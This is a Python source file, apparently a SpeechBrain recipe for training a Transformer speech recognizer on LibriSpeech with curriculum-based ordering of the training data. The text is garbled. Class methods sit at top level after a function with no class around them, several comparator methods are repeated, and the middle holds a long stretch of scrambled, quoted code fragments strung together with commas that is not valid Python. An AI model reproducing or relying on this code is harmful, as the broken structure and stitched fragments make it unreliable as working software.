            shuffled_data_ids += ordered_data_ids[start_index:end_index]
        assert len(shuffled_data_ids) == len(
            data_ids
        ), "OOPS!! Batchwise sorting gone wrong."

        weights = {}
        for index, data_id in enumerate(shuffled_data_ids):
            weights[data_id] = index
        return weights
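    # Worked example (assumed values, not from the original file): with ten
    # ids ordered a..j and batch_size = 4, the batches are [a,b,c,d],
    # [e,f,g,h], [i,j]. Reverse-sorting emits i,j,e,f,g,h,a,b,c,d, keeping
    # each batch internally contiguous while reversing batch order; random
    # batch shuffling permutes the same three batches instead:
    #
    #   ids = list("abcdefghij"); bs = 4
    #   batches = [ids[i * bs:(i + 1) * bs] for i in range(3)]
    #   reversed_order = sum(reversed(batches), [])  # i j e f g h a b c d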
    def _input_length_comparator(self, key1, key2):
        """Compare two data points based on input length (audio duration)"""
        duration1 = float(self.data[key1]["duration"])
        duration2 = float(self.data[key2]["duration"])
        if duration1 > duration2:
            return 1
        elif duration1 < duration2:
            return -1
        else:
            return 0

    def _output_length_comparator(self, key1, key2):
        """Compare two data points based on output length (transcript
        length)"""
        length1 = len(self.data[key1]["wrd"])
        length2 = len(self.data[key2]["wrd"])
        if length1 > length2:
            return 1
        elif length1 < length2:
            return -1
        else:
            return 0

    def _alphabetic_comparator(self, key1, key2):
        """Compare two data points alphabetically by transcript"""
        text1 = self.data[key1]["wrd"]
        text2 = self.data[key2]["wrd"]
        if text1 > text2:
            return 1
        elif text1 < text2:
            return -1
        else:
            return 0

def dataio_prepare(hparams):
    """This function prepares the datasets to be used in the brain class.
    It also defines the data processing pipeline through user-defined
    functions."""
    data_folder = hparams["data_folder"]

    train_data = CurriculumOrientedDynamicDataset.from_csv(
        csv_path=hparams["train_csv"], replacements={"data_root": data_folder},
    )
    ordering_info = hparams["ordering"]
    batch_selection = hparams["batch_selection"]
    batch_size = hparams["batch_size"]
    train_data = train_data.curriculum_based_filtered_sorted(
        ordering_info=ordering_info,
        batch_selection=batch_selection,
        batch_size=batch_size,
    )
    # when sorting, do not shuffle in the dataloader! otherwise it is
    # pointless
    hparams["train_dataloader_opts"]["shuffle"] = False

    # The legacy duration-based sorting is kept for reference:
    # if hparams["sorting"] == "ascending":
    #     # we sort training data to speed up training and get better results
    #     train_data = train_data.filtered_sorted(sort_key="duration")
    #     hparams["train_dataloader_opts"]["shuffle"] = False
    # elif hparams["sorting"] == "descending":
    #     train_data = train_data.filtered_sorted(
    #         sort_key="duration", reverse=True
    #     )
    #     hparams["train_dataloader_opts"]["shuffle"] = False
    # elif hparams["sorting"] == "random":
    #     pass
    # else:
    #     raise NotImplementedError(
    #         "sorting must be random, ascending or descending"
    #     )

    valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv(
        csv_path=hparams["valid_csv"], replacements={"data_root": data_folder},
    )
    valid_data = valid_data.filtered_sorted(sort_key="duration")

    # test is separate
    test_datasets = {}
    for csv_file in hparams["test_csv"]:
        name = Path(csv_file).stem
        test_datasets[name] = sb.dataio.dataset.DynamicItemDataset.from_csv(
            csv_path=csv_file, replacements={"data_root": data_folder}
        )
        test_datasets[name] = test_datasets[name].filtered_sorted(
            sort_key="duration"
        )

    datasets = [train_data, valid_data] + [i for k, i in test_datasets.items()]
    # We get the tokenizer as we need it to encode the labels when creating
    # mini-batches.
    tokenizer = hparams["tokenizer"]

    # 2. Define audio pipeline:
    @sb.utils.data_pipeline.takes("wav")
    @sb.utils.data_pipeline.provides("sig")
    def audio_pipeline(wav):
        sig = sb.dataio.dataio.read_audio(wav)
        return sig

    sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline)

    # 3. Define text pipeline:
    @sb.utils.data_pipeline.takes("wrd")
    @sb.utils.data_pipeline.provides(
        "wrd", "tokens_list", "tokens_bos", "tokens_eos", "tokens"
    )
    def text_pipeline(wrd):
        yield wrd
        tokens_list = tokenizer.encode_as_ids(wrd)
        yield tokens_list
        tokens_bos = torch.LongTensor([hparams["bos_index"]] + tokens_list)
        yield tokens_bos
        tokens_eos = torch.LongTensor(tokens_list + [hparams["eos_index"]])
        yield tokens_eos
        tokens = torch.LongTensor(tokens_list)
        yield tokens

    sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline)

    # 4. Set output:
    sb.dataio.dataset.set_output_keys(
        datasets,
        ["id", "sig", "wrd", "tokens_bos", "tokens_eos", "tokens", "duration"],
    )
    return train_data, valid_data, test_datasets, tokenizer

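# Hedged sketch (assumed key names, not from the original yaml) of the
# extra hyperparameters this recipe reads on top of the stock LibriSpeech
# transformer config:
#
#   ordering: "input_length:asc"   # curriculum weight spec; "" = random
#   batch_selection: "contiguous"  # contiguous | random | sorted | reverse-sorted
#   batch_size: 8                  # granularity of batch-level ordering
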
    def _filter_dataset(
        self, data_ids, key_min_value={}, key_max_value={}, key_test={}
    ):
        """Returns a list of data ids fulfilling the filtering criteria."""

        def combined_filter(computed, key_min_value, key_max_value, key_test):
            """Checks if the data example fulfills the filtering criteria."""
            for key, limit in key_min_value.items():
                if computed[key] >= limit:
                    continue
                return False
            for key, limit in key_max_value.items():
                if computed[key] <= limit:
                    continue
                return False
            for key, func in key_test.items():
                if bool(func(computed[key])):
                    continue
                return False
            return True

        temp_keys = (
            set(key_min_value.keys())
            | set(key_max_value.keys())
            | set(key_test.keys())
        )
        filtered_data_ids = []
        with self.output_keys_as(temp_keys):
            for data_id in data_ids:
                data_point = self.data[data_id]
                data_point["id"] = data_id
                computed = self.pipeline.compute_outputs(data_point)
                if combined_filter(
                    computed, key_min_value, key_max_value, key_test
                ):
                    filtered_data_ids.append(data_id)
        return filtered_data_ids

    def _weighted_filtered_sorted_ids(
        self, weights, min_value=None, max_value=None, select_n=None,
        reverse=False,
    ):
        """Returns a list of data ids, filtered and sorted using custom
        weights."""

        def weights_filter(weights, min_value, max_value):
            """Checks if the data example has weight within the range
            (`min_value`, `max_value`)."""
            if min_value is None and max_value is None:
                return weights
            if isinstance(min_value, int):
                min_value = float(min_value)
            if isinstance(max_value, int):
                max_value = float(max_value)
            # iterate over a copy: popping while iterating the dict itself
            # would raise a RuntimeError
            for key, value in list(weights.items()):
                if (isinstance(min_value, float) and value < min_value) or (
                    isinstance(max_value, float) and value > max_value
                ):
                    weights.pop(key, None)
            return weights

        filtered_weights = weights_filter(weights, min_value, max_value)
        filtered_ids = []
        for i, data_id in enumerate(filtered_weights):
            if select_n is not None and len(filtered_ids) == select_n:
                break
            filtered_ids.append((weights[data_id], i, data_id))
        filtered_sorted_ids = [
            tup[2] for tup in sorted(filtered_ids, reverse=reverse)
        ]
        return filtered_sorted_ids

    def _parse_dataset_order(self, dataset_order=""):
        """Takes in `ordering_info` in string form and creates a list of
        {"key", "order"} dictionaries out of it."""
        ordering_info = []
        orderings = dataset_order.split(",")
        for order in orderings:
            if order.strip() == "":
                continue
            column, order = order.split(":")
            ordering_info.append({"key": column, "order": order})
        return ordering_info

    def _random_shuffle_data_ids(self, data_ids):
        """Shuffle the data_ids."""
        return np.random.permutation(data_ids)

    def _random_shuffled_weights(self, data_ids):
        """Create random weightages for data_ids."""
        shuffled_ids = self._random_shuffle_data_ids(data_ids)
        weights = {}
        for index, id in enumerate(shuffled_ids):
            weights[id] = index
        return weights

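    # For reference, a string like "input_length:asc,output_length:desc"
    # is expected to parse (via _parse_dataset_order above) to:
    #
    #   [{"key": "input_length", "order": "asc"},
    #    {"key": "output_length", "order": "desc"}]
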
    def _random_shuffled_batches(self, weights=None, batch_size=8, reverse=False):
        """Randomly shuffle the dataset at batch level."""
        data_ids = list(weights.keys())
        # place every data_id at its weight index, so batches are built
        # over the sorted order
        for data_id in weights:
            data_ids[weights[data_id]] = data_id
        data_count = len(data_ids)
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        for batch in np.random.permutation(np.arange(batch_count)):
            start_index = batch_size * batch
            end_index = min(batch_size * (batch + 1), data_count)
            shuffled_data_ids += data_ids[start_index:end_index]
        assert len(shuffled_data_ids) == len(
            data_ids
        ), "OOPS!! Batchwise sorting gone wrong."
        weights = {}
        for index, data_id in enumerate(shuffled_data_ids):
            weights[data_id] = index
        return weights

    def _reverse_sort_batches(self, weights=None, batch_size=8):
        """Reverse sort the dataset at batch level."""
        data_ids = list(weights.keys())
        for data_id in weights:
            data_ids[weights[data_id]] = data_id
        data_count = len(data_ids)
        batch_count = math.ceil(data_count / batch_size)
        shuffled_data_ids = []
        for batch in np.flipud(np.arange(batch_count)):
            start_index = batch_size * batch
            end_index = min(batch_size * (batch + 1), data_count)
            shuffled_data_ids += data_ids[start_index:end_index]
        assert len(shuffled_data_ids) == len(
            data_ids
        ), "OOPS!! Batchwise sorting gone wrong."
        weights = {}
        for index, data_id in enumerate(shuffled_data_ids):
            weights[data_id] = index
        return weights

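    # Worked example (assumed toy weights, batch_size=2): with
    # weights == {"a": 0, "b": 1, "c": 2, "d": 3}, the sorted order is
    # ["a", "b", "c", "d"]; the batches ["a", "b"] and ["c", "d"] are then
    # permuted as units, so one possible result is ["c", "d", "a", "b"],
    # which is re-encoded as {"c": 0, "d": 1, "a": 2, "b": 3}.
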
    def _custom_sorted_weights(self, data_ids, dataset_orderings):
        """Create `weights` for data points using `ordering_info`."""

        def compare(key1, key2):
            """Comparing logic, as `ordering_info` can contain multiple keys.
            Note: Value and its meaning
            *  1 - key1 > key2
            * -1 - key1 < key2
            *  0 - key1 = key2
            """
            res = 0
            for ordering in dataset_orderings:
                key = ordering["key"]
                order = 1 if ordering["order"] == "asc" else -1
                if key == "input_length":
                    res = self._input_length_comparator(key1, key2)
                elif key == "output_length":
                    res = self._output_length_comparator(key1, key2)
                elif key == "alphabetic":
                    res = self._alphabetic_comparator(key1, key2)
                res *= order
                # If comparison using `key` returned the data points as
                # equal, continue comparing using the next key, else return
                # the result
                if res == 0:
                    continue
                else:
                    return res
            return res

        shuffled_data_ids = self._random_shuffle_data_ids(data_ids)
        sorted_data_ids = sorted(shuffled_data_ids, key=cmp_to_key(compare))
        weights = {}
        for index, id in enumerate(sorted_data_ids):
            weights[id] = index
        return weights

    def _input_length_comparator(self, key1, key2):
        """Compare two data points based on input length."""
        duration1 = float(self.data[key1]["duration"])
        duration2 = float(self.data[key2]["duration"])
        if duration1 > duration2:
            return 1
        elif duration1 < duration2:
            return -1
        else:
            return 0

    def _output_length_comparator(self, key1, key2):
        """Compare two data points based on output length."""
        length1 = len(self.data[key1]["wrd"])
        length2 = len(self.data[key2]["wrd"])
        if length1 > length2:
            return 1
        elif length1 < length2:
            return -1
        else:
            return 0

    def _alphabetic_comparator(self, key1, key2):
        """Compare two data points based on alphabetic order."""
        text1 = self.data[key1]["wrd"]
        text2 = self.data[key2]["wrd"]
        if text1 > text2:
            return 1
        elif text1 < text2:
            return -1
        else:
            return 0

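    # Example of the multi-key comparison above: with
    # ordering_info == "input_length:asc,alphabetic:asc", two utterances of
    # the same duration compare equal on `input_length` (res == 0), so the
    # tie is broken by `alphabetic`; a `desc` order simply multiplies the
    # comparator result by -1.

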
class ASR(sb.core.Brain):
    r"""Brain class abstracts away the details of data loops.

    The primary purpose of the `Brain` class is the implementation of the
    ``fit()`` method, which iterates epochs and datasets for the purpose of
    "fitting" a set of modules to a set of data.

    In order to use the ``fit()`` method, one should sub-class the ``Brain``
    class and override any methods for which the default behavior does not
    match the use case. For a simple use case (e.g., training a single model
    with a single dataset), the only methods that need to be overridden are:

    * ``compute_forward()``
    * ``compute_objectives()``

    See the base ``Brain`` class for an example of how overriding these two
    methods is done. For more complicated use cases, such as multiple
    modules that need to be updated, the following methods can be
    overridden:

    * ``fit_batch()``
    * ``evaluate_batch()``

    Arguments
    ---------
    modules : dict of str:torch.nn.Module pairs
        These modules are passed to the optimizer by default if they have
        trainable parameters, and will have ``train()``/``eval()`` called on
        them.
    opt_class : torch.optim class
        A torch optimizer constructor that takes only the list of parameters
        (e.g., a lambda or partial function definition). By default, this
        will be passed all modules in ``modules`` at the beginning of the
        ``fit()`` method. This behavior can be changed by overriding the
        ``configure_optimizers()`` method.
    hparams : dict
        Each key:value pair should consist of a string key and a
        hyperparameter that is used within the overridden methods. These
        will be accessible via an ``hparams`` attribute, using "dot"
        notation: e.g., self.hparams.model(x).
    run_opts : dict
        A set of options to change the runtime environment, including

        debug (bool)
            If ``True``, this will only iterate a few batches for all
            datasets, to ensure code runs without crashing.
        debug_batches (int)
            Number of batches to run in debug mode. Default ``2``.
        debug_epochs (int)
            Number of epochs to run in debug mode. Default ``2``.
            If a non-positive number is passed, all epochs are run.
        jit_module_keys (list of str)
            List of keys in ``modules`` that should be jit compiled.
        distributed_count (int)
            Number of devices to run on.
        distributed_backend (str)
            One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``.
        device (str)
            The location for performing computations.
        auto_mix_prec (bool)
            If ``True``, automatic mixed-precision is used.
            Activate it only with cuda.
        max_grad_norm (float)
            Default implementation of ``fit_batch()`` uses
            ``clip_grad_norm_`` with this value. Default: ``5``.
        nonfinite_patience (int)
            Number of times to ignore non-finite losses before stopping.
            Default: ``3``.
        noprogressbar (bool)
            Whether to turn off progressbar when training. Default:
            ``False``.
        ckpt_interval_minutes (float)
            Amount of time between saving intra-epoch checkpoints,
            in minutes.
    checkpointer : speechbrain.Checkpointer
        By default, this will be used to load checkpoints, and will have the
        optimizer added to continue training if interrupted.
    inter_epoch_dataset_updation : bool
        Whether the dataset must be updated between epochs or not. It is
        used in CL, which takes feedback from the model and reshuffles the
        dataset. By default, it is False.
    sortagrad : int
        Number of epochs for which the curriculum-based dataset should be
        used. It can take one of the following values:

        * ``-1`` - Use curriculum learning for all epochs
        * ``n`` - Use curriculum learning for ``n`` number of epochs

        By default, it is ``-1``.
    """

    def __init__(
        self,
        modules=None,
        opt_class=None,
        hparams=None,
        run_opts=None,
        checkpointer=None,
        inter_epoch_dataset_updation=False,
        sortagrad=-1,
    ):
        super().__init__(
            modules=modules,
            opt_class=opt_class,
            hparams=hparams,
            run_opts=run_opts,
            checkpointer=checkpointer,
        )
        # save attributes related to curriculum learning
        self.inter_epoch_dataset_updation = inter_epoch_dataset_updation
        self.ordering = self.hparams.ordering
        self.batch_selection = self.hparams.batch_selection
        self.sortagrad = sortagrad
        # create tensorboard summary writer
        self.tensorboard_writer = SummaryWriter(
            self.hparams.output_folder + "/tensorboard"
        )

    def compute_forward(self, batch, stage):
        """Forward computations from the waveform batches to the output
        probabilities."""
        batch = batch.to(self.device)
        wavs, wav_lens = batch.sig
        tokens_bos, _ = batch.tokens_bos

        # Add augmentation if specified
        if stage == sb.Stage.TRAIN:
            if hasattr(self.modules, "env_corrupt"):
                wavs_noise = self.modules.env_corrupt(wavs, wav_lens)
                wavs = torch.cat([wavs, wavs_noise], dim=0)
                wav_lens = torch.cat([wav_lens, wav_lens])
                tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0)

        # compute features
        feats = self.hparams.compute_features(wavs)
        current_epoch = self.hparams.epoch_counter.current
        feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch)
        if stage == sb.Stage.TRAIN:
            if hasattr(self.hparams, "augmentation"):
                feats = self.hparams.augmentation(feats)

        # forward modules
        src = self.modules.CNN(feats)
        enc_out, pred = self.modules.Transformer(
            src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index
        )

        # output layer for ctc log-probabilities
        logits = self.modules.ctc_lin(enc_out)
        p_ctc = self.hparams.log_softmax(logits)

        # output layer for seq2seq log-probabilities
        pred = self.modules.seq_lin(pred)
        p_seq = self.hparams.log_softmax(pred)

        # Compute outputs
        hyps = None
        if stage == sb.Stage.TRAIN:
            hyps = None
        elif stage == sb.Stage.VALID:
            hyps = None
            current_epoch = self.hparams.epoch_counter.current
            if current_epoch % self.hparams.valid_search_interval == 0:
                # for the sake of efficiency, we only perform beamsearch
                # with limited capacity and no LM to give the user some idea
                # of how the AM is doing
                hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens)
        elif stage == sb.Stage.TEST:
            hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens)

        return p_ctc, p_seq, wav_lens, hyps

\"\"\" if not ( isinstance(train_set, DataLoader) or", "can contain multiple keys Note: Value and its meaning * 1 - key1", "% valid_search_interval == 0 or stage == sb.Stage.TEST ): stage_stats[\"WER\"] = self.wer_metric.summarize(\"error_rate\") #", "= train_data.filtered_sorted( # sort_key=\"duration\", reverse=True # ) # # when sorting do not", "end of epoch \"\"\" if self.inter_epoch_dataset_updation: if self.sortagrad != -1: # number of", "anneal lr every update self.hparams.noam_annealing(self.optimizer) return loss.detach() , loss_ctc.detach(), loss_seq.detach() def evaluate_batch(self, batch,", "elif stage == sb.Stage.TEST: hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens) return p_ctc, p_seq, wav_lens,", "# when sorting do not shuffle in dataloader ! otherwise is pointless #", "with torch.no_grad(): asr_brain.evaluate( test_datasets[k], max_key=\"ACC\", test_loader_kwargs=hparams[\"test_dataloader_opts\"], ) # # print(train_data) # train_set =", "def combined_filter(computed, key_min_value, key_max_value, key_test): \"\"\"Checks if the data example fulfills the filtering", "(or should) be overridden. The following methods are used and expected to have", "which curriculum based dataset be used. It can take one of three values", "whether the dataset needs to be reshuffled at the end of epoch \"\"\"", "batch in t: # # print(batch.duration) # # print(batch.wrd) # # if cnt", "\"sorted\" if len(dataset_ordering) > 0 else \"random\" filtered_data_ids = self._filter_dataset(self.data_ids, key_min_value, key_max_value, key_test)", "= self.hparams.compute_features(wavs) current_epoch = self.hparams.epoch_counter.current feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch) if stage ==", "self.hparams.ctc_weight * loss_ctc + (1 - self.hparams.ctc_weight) * loss_seq ) if stage !=", "If ``True``, this will only iterate a few batches for all datasets, to", "# We get the tokenizer as we need it to encode the labels", "validation \"on_stage_end\" on main process self.step = 0 run_on_main( self.on_stage_end, args=[Stage.VALID, avg_valid_loss, epoch],", ">= limit: continue return False for key, limit in key_max_value.items(): if computed[key] <=", "the first n data points found. Meant for debugging. Returns ------- FilteredSortedDynamicItemDataset Shares", "self.hparams.acc_computer() self.wer_metric = self.hparams.error_rate_computer() def on_stage_end(self, stage, stage_loss, epoch): \"\"\"Gets called at the", "stage = Stage.TRAIN, # **hparams[\"valid_dataloader_opts\"] # ) # with tqdm( # train_set, #", "only if `weights` is None batch_selection : str Information on how to order", "np.random.permutation(data_ids) def _random_shuffled_weights( self, data_ids ): \"\"\"Create random weightages for data_ids\"\"\" shuffled_ids =", "(int) Number of devices to run on. distributed_backend (str) One of ``ddp_nccl``, ``ddp_gloo``,", "self.optimizer = self.hparams.SGD(self.modules.parameters()) if self.checkpointer is not None: self.checkpointer.add_recoverable(\"optimizer\", self.optimizer) self.switched = True", "python3 \"\"\"Recipe for training a Transformer ASR system with librispeech. 
    def fit_batch(self, batch):
        """Train the parameters given a single batch in input."""
        # check if we need to switch optimizer
        # if so change the optimizer from Adam to SGD
        self.check_and_reset_optimizer()

        predictions = self.compute_forward(batch, sb.Stage.TRAIN)
        loss, loss_ctc, loss_seq = self.compute_objectives(
            predictions, batch, sb.Stage.TRAIN
        )

        # normalize the loss by the gradient_accumulation step
        (loss / self.hparams.gradient_accumulation).backward()

        if self.step % self.hparams.gradient_accumulation == 0:
            # gradient clipping & early stop if loss is not finite
            self.check_gradients(loss)
            self.optimizer.step()
            self.optimizer.zero_grad()

            # anneal lr every update
            self.hparams.noam_annealing(self.optimizer)

        return loss.detach(), loss_ctc.detach(), loss_seq.detach()

    def evaluate_batch(self, batch, stage):
        """Computations needed for validation/test batches."""
        with torch.no_grad():
            predictions = self.compute_forward(batch, stage=stage)
            loss, _, _ = self.compute_objectives(
                predictions, batch, stage=stage
            )
        return loss.detach()

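    # Accumulation arithmetic (assuming gradient_accumulation == 4): each
    # backward() adds loss/4 gradients, and the optimizer only steps when
    # self.step is a multiple of 4, so the effective batch size is 4x the
    # dataloader batch size.
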
    def on_stage_start(self, stage, epoch):
        """Gets called at the beginning of each epoch."""
        if stage != sb.Stage.TRAIN:
            self.acc_metric = self.hparams.acc_computer()
            self.wer_metric = self.hparams.error_rate_computer()

    def on_stage_end(self, stage, stage_loss, epoch):
        """Gets called at the end of an epoch."""
        # Compute/store important stats
        stage_stats = {"loss": stage_loss}
        if stage == sb.Stage.TRAIN:
            self.train_stats = stage_stats
            self.recreate_train_dataset(
                epoch=self.hparams.epoch_counter.current
            )
        else:
            stage_stats["ACC"] = self.acc_metric.summarize()
            current_epoch = self.hparams.epoch_counter.current
            valid_search_interval = self.hparams.valid_search_interval
            if (
                current_epoch % valid_search_interval == 0
                or stage == sb.Stage.TEST
            ):
                stage_stats["WER"] = self.wer_metric.summarize("error_rate")

        # log stats and save checkpoint at end-of-epoch
        if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process():

            # report different epoch stages according to the current stage
            current_epoch = self.hparams.epoch_counter.current
            if current_epoch <= self.hparams.stage_one_epochs:
                lr = self.hparams.noam_annealing.current_lr
                steps = self.hparams.noam_annealing.n_steps
                optimizer = self.optimizer.__class__.__name__
            else:
                lr = self.hparams.lr_sgd
                steps = -1
                optimizer = self.optimizer.__class__.__name__

            epoch_stats = {
                "epoch": epoch,
                "lr": lr,
                "steps": steps,
                "optimizer": optimizer,
            }
            self.hparams.train_logger.log_stats(
                stats_meta=epoch_stats,
                train_stats=self.train_stats,
                valid_stats=stage_stats,
            )
            self.checkpointer.save_and_keep_only(
                meta={"ACC": stage_stats["ACC"], "epoch": epoch},
                max_keys=["ACC"],
                num_to_keep=5,
            )
        elif stage == sb.Stage.TEST:
            self.hparams.train_logger.log_stats(
                stats_meta={"Epoch loaded": self.hparams.epoch_counter.current},
                test_stats=stage_stats,
            )
            with open(self.hparams.wer_file, "w") as w:
                self.wer_metric.write_stats(w)

            # save the averaged checkpoint at the end of the evaluation stage
            # delete the rest of the intermediate checkpoints
            # ACC is set to 1.1 so checkpointer only keeps the averaged
            # checkpoint
            self.checkpointer.save_and_keep_only(
                meta={"ACC": 1.1, "epoch": epoch},
                max_keys=["ACC"],
                num_to_keep=1,
            )

    def recreate_train_dataset(self, epoch):
        """Gets called at the end of an epoch. This is used to handle
        whether the dataset needs to be reshuffled at the end of the epoch.
        """
        if self.inter_epoch_dataset_updation:
            if self.sortagrad != -1:
                # number of epochs for which curriculum must be used is
                # defined
                if self.sortagrad < epoch:
                    # recreate dataset using random shuffling
                    return
                else:
                    # recreate dataset using preferred cl approach
                    return
        else:
            return

    def check_and_reset_optimizer(self):
        """Reset the optimizer if training enters stage 2."""
        current_epoch = self.hparams.epoch_counter.current
        if not hasattr(self, "switched"):
            self.switched = False
            if isinstance(self.optimizer, torch.optim.SGD):
                self.switched = True

        if self.switched is True:
            return

        if current_epoch > self.hparams.stage_one_epochs:
            self.optimizer = self.hparams.SGD(self.modules.parameters())

            if self.checkpointer is not None:
                self.checkpointer.add_recoverable("optimizer", self.optimizer)

            self.switched = True

    def on_fit_start(self):
        """Initialize the right optimizer on the training start."""
        super().on_fit_start()

        # if the model is resumed from stage two, reinitialize the optimizer
        current_epoch = self.hparams.epoch_counter.current
        current_optimizer = self.optimizer
        if current_epoch > self.hparams.stage_one_epochs:
            del self.optimizer
            self.optimizer = self.hparams.SGD(self.modules.parameters())

            # Load latest checkpoint to resume training if interrupted
            if self.checkpointer is not None:

                # do not reload the weights if training is interrupted
                # right before stage 2
                group = current_optimizer.param_groups[0]
                if "momentum" not in group:
                    return

                self.checkpointer.recover_if_possible(
                    device=torch.device(self.device)
                )

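    # Stage schedule sketch (hypothetical stage_one_epochs == 40): epochs
    # 1-40 train with the Adam optimizer under Noam annealing; from epoch
    # 41 on, check_and_reset_optimizer() swaps in SGD (hparams.SGD) exactly
    # once, and on_fit_start() re-creates SGD when resuming inside stage 2.
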
    def fit(
        self,
        epoch_counter,
        train_set,
        valid_set=None,
        progressbar=None,
        train_loader_kwargs={},
        valid_loader_kwargs={},
    ):
        """Iterate epochs and datasets to improve objective.

        Relies on the existence of multiple functions that can (or should)
        be overridden. The following methods are used and expected to have
        a certain behavior:

        * ``fit_batch()``
        * ``evaluate_batch()``
        * ``update_average()``

        If the initialization was done with distributed_count > 0 and the
        distributed_backend is ddp, this will generally handle multiprocess
        logic, like splitting the training data into subsets for each
        device and only saving a checkpoint on the main process.

        Arguments
        ---------
        epoch_counter : iterable
            Each call should return an integer indicating the epoch count.
        train_set : Dataset, DataLoader
            A set of data to use for training. If a Dataset is given, a
            DataLoader is automatically created. If a DataLoader is given,
            it is used directly.
        valid_set : Dataset, DataLoader
            A set of data to use for validation. If a Dataset is given, a
            DataLoader is automatically created. If a DataLoader is given,
            it is used directly.
        train_loader_kwargs : dict
            Kwargs passed to `make_dataloader()` for making the train_loader
            (if train_set is a Dataset, not DataLoader). E.g., batch_size,
            num_workers. DataLoader kwargs are all valid.
        valid_loader_kwargs : dict
            Kwargs passed to `make_dataloader()` for making the valid_loader
            (if valid_set is a Dataset, not DataLoader). E.g., batch_size,
            num_workers. DataLoader kwargs are all valid.
        progressbar : bool
            Whether to display the progress of each epoch in a progressbar.
        """
        if not (
            isinstance(train_set, DataLoader)
            or isinstance(train_set, LoopedLoader)
        ):
            train_set = self.make_dataloader(
                train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs
            )
        if valid_set is not None and not (
            isinstance(valid_set, DataLoader)
            or isinstance(valid_set, LoopedLoader)
        ):
            valid_set = self.make_dataloader(
                valid_set,
                stage=sb.Stage.VALID,
                ckpt_prefix=None,
                **valid_loader_kwargs,
            )

        self.on_fit_start()
        self.train_set = train_set
        total_steps = len(train_set)

        if progressbar is None:
            progressbar = not self.noprogressbar

        # Iterate epochs
        for epoch in epoch_counter:

            # Training stage
            self.on_stage_start(Stage.TRAIN, epoch)
            self.modules.train()

            # Reset nonfinite count to 0 each epoch
            self.nonfinite_count = 0

            if self.train_sampler is not None and hasattr(
                self.train_sampler, "set_epoch"
            ):
                self.train_sampler.set_epoch(epoch)

            # Time since last intra-epoch checkpoint
            last_ckpt_time = time.time()

            # Only show progressbar if requested and main_process
            enable = progressbar and sb.utils.distributed.if_main_process()
            completed_steps = (epoch - 1) * total_steps
            with tqdm(
                self.train_set,
                initial=self.step,
                dynamic_ncols=True,
                disable=not enable,
            ) as t:
                for batch in t:
                    self.step += 1
                    global_step = completed_steps + self.step
                    loss, loss_ctc, loss_seq = self.fit_batch(batch)
                    self.avg_train_loss = self.update_average(
                        loss, self.avg_train_loss
                    )
                    t.set_postfix(train_loss=self.avg_train_loss)

                    # Write training summary to tensorboard
                    self.tensorboard_writer.add_scalar(
                        "Train/Loss/tot_loss", loss, global_step
                    )
                    self.tensorboard_writer.add_scalar(
                        "Train/Loss/ctc_loss", loss_ctc, global_step
                    )
                    self.tensorboard_writer.add_scalar(
                        "Train/Loss/att_loss", loss_seq, global_step
                    )

                    # Debug mode only runs a few batches
                    if self.debug and self.step == self.debug_batches:
                        break

                    if (
                        self.checkpointer is not None
                        and self.ckpt_interval_minutes > 0
                        and time.time() - last_ckpt_time
                        >= self.ckpt_interval_minutes * 60.0
                    ):
                        run_on_main(self._save_intra_epoch_ckpt)
                        last_ckpt_time = time.time()

            # Run train "on_stage_end" on all processes
            self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch)
            self.avg_train_loss = 0.0
            self.step = 0
            # Validation stage
            if valid_set is not None:
                self.on_stage_start(Stage.VALID, epoch)
                self.modules.eval()
                avg_valid_loss = 0.0
                with torch.no_grad():
                    for batch in tqdm(
                        valid_set, dynamic_ncols=True, disable=not enable
                    ):
                        self.step += 1
                        loss = self.evaluate_batch(batch, stage=Stage.VALID)
                        avg_valid_loss = self.update_average(
                            loss, avg_valid_loss
                        )

                        # Debug mode only runs a few batches
                        if self.debug and self.step == self.debug_batches:
                            break

                    # Write validation summary to tensorboard
                    self.tensorboard_writer.add_scalar(
                        "Validation/Loss/tot_loss", avg_valid_loss, epoch
                    )
                    self.tensorboard_writer.add_scalar(
                        "Validation/Accuracy/tot_acc",
                        self.acc_metric.summarize(),
                        epoch,
                    )

                    # Only run validation "on_stage_end" on main process
                    self.step = 0
                    run_on_main(
                        self.on_stage_end,
                        args=[Stage.VALID, avg_valid_loss, epoch],
                    )

            # Debug mode only runs a few epochs
            if self.debug and epoch == self.debug_epochs:
                break

    def on_evaluate_start(self, max_key=None, min_key=None):
        """Perform checkpoint average if needed."""
        super().on_evaluate_start()

        ckpts = self.checkpointer.find_checkpoints(
            max_key=max_key, min_key=min_key
        )
        ckpt = sb.utils.checkpoints.average_checkpoints(
            ckpts, recoverable_name="model", device=self.device
        )

        self.hparams.model.load_state_dict(ckpt, strict=True)
        self.hparams.model.eval()

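    # Note on the averaging above: since validation keeps the 5 best-ACC
    # checkpoints (num_to_keep=5 in on_stage_end), find_checkpoints()
    # returns those, and average_checkpoints() averages their "model"
    # parameters before evaluation.

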
